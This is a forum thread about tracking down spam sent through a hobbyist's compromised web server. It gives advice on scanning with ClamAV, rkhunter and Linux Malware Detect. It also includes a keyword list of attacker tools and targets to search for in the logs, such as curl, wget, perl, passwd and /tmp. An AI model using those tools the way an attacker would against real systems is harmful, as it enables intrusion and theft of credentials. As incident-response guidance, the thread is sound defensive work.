Spam being sent via httpd - How to track down

descendant_command · 09-29-2016, 02:08 PM

Quote:

Originally Posted by rustyz82

Yeah, I see the error in how I setup the site and user now. I used the same user I login with as the web server user

Wow.
So everything your user has access to is potentially compromised, not 'just' the entire webroot....

Quote:

Originally Posted by rustyz82

While I appreciate your advice, and this is probably what I will end up doing, this isn't a critical site/box ... I personally have this VPS as a hobby and enjoy challenges like this. If this were a critical or at all important machine or website ... but since its not...

It certainly IS to everybody that has to put up with the spam and malware industry YOU are providing hosting for, along with DDOS and other attack vectors that could be spewing from YOUR "unimportant" server whenever it's real owner decides.
Who do you think the authorities are going to come and "talk to" about the kiddie-porn that they find being hosted and distributed by YOUR server?

Habitual · 09-29-2016, 07:18 PM

Quote:

Originally Posted by rustyz82

While I appreciate your advice, and this is probably what I will end up doing, this isn't a critical site/box and I see this as the perfect opportunity to learn. You advice is overall sound but condescending in nature. I personally have this VPS as a hobby and enjoy challenges like this. If this were a critical or at all important machine or website I would say you are 100% correct in your statements about hiring a professional but since its not, I would rather take this as an opportunity to learn and grow as a sysadmin.. and eventually, i'll know what i'm doing. How else, am I going to learn?

I didn't mean to sound condescending, sorry.
I just meant to impart the finality of the situation. It is a Great Time to Learn and this is a perfect opportunity.
Sorry for my terse answer. Most folks want a fix, not a path to a solution.

Start with https://www.linuxquestions.org/quest...erences-45261/

Look for in these keywords in the logs....

PHP Code:



chmod bash curl lwp-request wget lwp-download rm /tmp /var/tmp perl passwd group

clamscan is a great indicator (it doesn't clean anything but has a nice report feature)

Apt-based OS assumed. Else 's/apt/yum/g'
install it using

Code:

sudo apt-get install -y clamav

To manually run a scan, use

Code:

clamscan -ir /path/to/scan/

-i is infected
-r is report
real example of a run:

Code:

----------- SCAN SUMMARY -----------
Known viruses: 4879143
Engine version: 0.98.7
Scanned directories: 5
Scanned files: 34
Infected files: 0
Data scanned: 4.22 MB
Data read: 2.58 MB (ratio 1.63:1)
Time: 31.835 sec (0 m 31 s)

rkhunter 1.4.3

Code:

cd /usr/src/
wget http://rkhunter.cvs.sourceforge.net/viewvc/rkhunter/rkhunter/?view=tar
mv index.html\?view\=tar rkhunter.tar.gz
tar zxf rkhunter.tar.gz
mv rkhunter rkhunter-1-4-3
cd  rkhunter-1-4-3
./installer.sh --install
rkhunter --update

Before you scan however, to eliminate false positives on the first run, see
"What to do with "common" warnings" blurb at https://help.ubuntu.com/community/RKhunter

LinuxMalwareDetect

Code:

cd /usr/src/
wget http://www.rfxn.com/downloads/maldetect-current.tar.gz

untar it
cd into it
sudo ./install.sh

Finally, update and run

Code:

maldet -du && maldet -a /var/www/

Good Luck and Good Learning!